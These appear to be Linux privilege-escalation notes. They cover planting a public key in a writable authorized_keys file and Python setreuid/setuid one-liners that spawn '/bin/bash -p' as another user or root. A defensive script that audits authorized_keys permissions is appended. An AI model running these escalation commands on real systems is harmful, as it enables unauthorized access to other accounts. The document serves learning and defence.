PoC in video format: https://youtu.be/xLb2wo66Xr0
- using the public key authentication technique to escape
  - check the .ssh directory: do we have write permission on authorized_keys?
  - write our own public key into the authorized_keys file
  - ssh into the user with the matching private key
  // notes: the public/private key pair can be generated with ssh-keygen.
  // caveat: with StrictModes yes (the sshd default), sshd ignores an authorized_keys file whose file, .ssh directory or home directory is group/world-writable or owned by anyone other than the user or root, so this step depends on that check being disabled or satisfied.
- using python setreuid to escape
  current setup:
    euid user: 1000 (Eve)
    uid user: 33 (www-data)
  // notes: an unprivileged process may set its real uid to its current effective uid, so setting both to the euid is allowed here.
  rough idea how it works, executing step by step:
    $ python
    >>> import os
    >>> os.setreuid(1000, 1000)   # setreuid(ruid, euid): make the real uid match the effective uid
    >>> os.system("/bin/bash -p")
  one line command:
    python -c 'import os; os.setreuid(1000, 1000); os.system("/bin/bash -p")'
- the public key authentication technique above also works for the normal (euid) user
- using python setuid to escape an EUID-limited shell
  // notes: os.setuid(0) only succeeds when the effective uid is already 0 (or the process has CAP_SETUID).
  rough idea how it works, executing step by step:
    # python
    >>> import os
    >>> os.setuid(0)
    >>> os.system("/bin/bash -p")
  one line command:
    python -c 'import os; os.setuid(0); os.system("/bin/bash -p")'
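As an added example (not part of the original notes), the following Python audit applies the same ownership and write-permission rules that sshd enforces with StrictModes to a user's home, .ssh and authorized_keys, so a defender can find accounts whose key file another local user could write to (the first technique above). The home path, owner uid and placeholder key file are constructed for the demo.

```python
import os
import stat
import tempfile


def check_authorized_keys(home, owner_uid):
    """Return findings for home/.ssh/authorized_keys; an empty list means it passes.

    Mirrors the rules sshd applies under StrictModes yes: the home directory,
    .ssh and authorized_keys must each be owned by the user (or root) and must
    not be group- or world-writable. A missing key file is not a finding.
    """
    ssh_dir = os.path.join(home, ".ssh")
    key_file = os.path.join(ssh_dir, "authorized_keys")
    if not os.path.exists(key_file):
        return []
    findings = []
    for path in (home, ssh_dir, key_file):
        st = os.stat(path)
        if st.st_uid not in (owner_uid, 0):
            findings.append("%s: owned by uid %d, expected %d or root"
                            % (path, st.st_uid, owner_uid))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append("%s: group/world writable (mode %o)"
                            % (path, st.st_mode & 0o777))
    return findings


def build_fixture(key_mode):
    """Constructed home directory in a temp dir with authorized_keys set to key_mode."""
    home = tempfile.mkdtemp()
    os.chmod(home, 0o755)
    ssh_dir = os.path.join(home, ".ssh")
    os.mkdir(ssh_dir)
    os.chmod(ssh_dir, 0o700)
    key_file = os.path.join(ssh_dir, "authorized_keys")
    with open(key_file, "w") as f:
        f.write("# constructed placeholder, no real key material\n")
    os.chmod(key_file, key_mode)
    return home


def audit_fixture(key_mode):
    """Audit a constructed home owned by the current user; [] means it passes."""
    return check_authorized_keys(build_fixture(key_mode), os.getuid())


if __name__ == "__main__":
    for mode in (0o600, 0o666):
        print(oct(mode), audit_fixture(mode) or "ok")
```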